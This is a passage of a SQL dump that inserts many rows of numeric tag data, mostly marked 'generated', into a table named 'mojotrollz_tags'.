`table`, `type`, `value`, `comment`) VALUES (5957, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5958, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5958, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5958, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5958, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5958, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5958, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5974, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5974, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5975, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5975, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5976, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5976, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5977, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5977, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5978, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5978, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5979, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5979, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5981, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5982, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5982, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5983, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5983, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5984, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5984, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5985, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5985, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5988, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5988, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5990, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5990, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5991, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5991, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5992, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5992, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5993, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5993, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5994, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5994, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5994, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5994, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5994, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5994, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5996, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5996, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5997, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5997, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5998, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5998, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5999, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5999, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6000, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6000, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6001, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6001, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6002, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6002, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6003, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6003, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6004, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6004, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6005, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6005, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6006, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6006, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6007, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6007, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6008, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6008, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6009, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6009, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6010, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6010, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6011, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6011, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6012, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6013, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6014, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6014, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6014, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6014, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6014, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6014, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6015, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6015, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6016, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6017, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6018, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6018, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6018, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6018, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6018, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6018, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6019, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6019, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6020, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6020, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6021, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6026, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6026, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6027, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6027, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6027, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6027, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6027, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6027, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6028, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6028, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6030, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6030, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6031, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6031, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6033, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6033, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6034, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6034, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6035, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6035, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6035, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6047, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6066, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6068, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6068, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6069, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6070, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6071, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6072, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6072, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6073, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6073, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6074, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6075, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6076, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6086, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6086, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6087, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6087, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6089, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6089, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6090, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6090, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6091, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6091, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6093, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6093, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6094, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6094, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6109, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6109, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6110, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6111, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6112, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6113, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6113, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6114, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6114, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6115, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6115, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6116, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6117, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6118, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6118, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6119, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6120, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6120, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6121, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6121, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6122, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6122, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6123, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6123, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6124, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6124, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6125, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6125, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6126, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6126, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6127, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6127, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6128, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6128, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6129, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6129, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6130, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6130, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6131, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6131, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6132, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6132, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6133, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6133, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6134, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6134, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6135, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6135, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6136, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6137, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6137, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6138, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6138, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6139, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6139, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6140, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6140, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6141, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6141, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6142, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6142, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6143, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6143, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6144, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6144, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6145, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6145, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6146, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6146, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6147, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6147, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6148, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6148, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6166, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6166, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6167, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6167, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6168, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6168, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6168, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6169, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6169, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6170, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6170, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6171, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6171, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6172, 1, 1, 0, 'generated'); INSERT 